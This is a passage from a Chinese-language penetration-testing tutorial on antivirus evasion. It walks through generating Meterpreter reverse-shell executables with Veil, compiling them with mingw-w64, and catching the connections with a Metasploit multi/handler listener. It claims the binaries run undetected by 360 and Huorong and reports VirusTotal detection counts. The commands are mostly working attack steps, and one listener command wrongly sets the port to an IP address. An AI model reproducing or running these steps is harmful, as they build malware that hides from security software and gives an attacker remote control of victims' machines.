然后再设定好生成的payload的名称,我这里就用go_msf了
然后一堆编码编译之后,就生成payload了
因为之前已经做过映射,所以在宿主机的/tmp/veil-output/compiled/目录可直接看到生成的exe文件。
在msf中监听
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_httpsmsf5 exploit(multi/handler) > set lport 3334msf5 exploit(multi/handler) > set lport 10.211.55.2msf5 exploit(multi/handler) > exploit
在测试主机执行go_msf.exe,发现msf中可上线
而此时是正常打开360和火绒的
virustotal.com中44/71个报毒
虽然查杀率还比较高,不过火绒和360都能静态+动态免杀。比较遗憾的是生成的exe文件比较大,go语言生成的exe大约2M,python生成的exe大约4M,ruby生成的exe大约700K,相比msf原生态的exe大打多了。
使用veil+mingw+w64(VT查杀率23/71)先用veil生成shellcode
# veiluse 1 #选择使用 Veil-Evasion 模块Veil-Evasion Menu 41 payloads loadedAvailable Commands: back Go to main Veil menu checkvt Check virustotal against generated hashes clean Remove generated artifacts exit Exit Veil info Information on a specific payload list List available payloads use Use a specific payloadVeil-Evasion command: use 7 #选择payload c/meterpreter/rev_tcp.py[cs/meterpreter/rev_tcp>>] set LHOST 10.211.55.2[cs/meterpreter/rev_tcp>>] set LPORT 3333[cs/meterpreter/rev_tcp>>] generate
输入生成文件名为c_msf
先生成一个可以被 msf 利用的 c_msf.c 然后用mingw-w64 来编译
mingw-w64的安装可参考https://zhuanlan.zhihu.com/p/76613134
全程开启360卫士和杀毒以及火绒,编译、运行、上线都没有问题。
virustotal.com中23/71个报毒
小结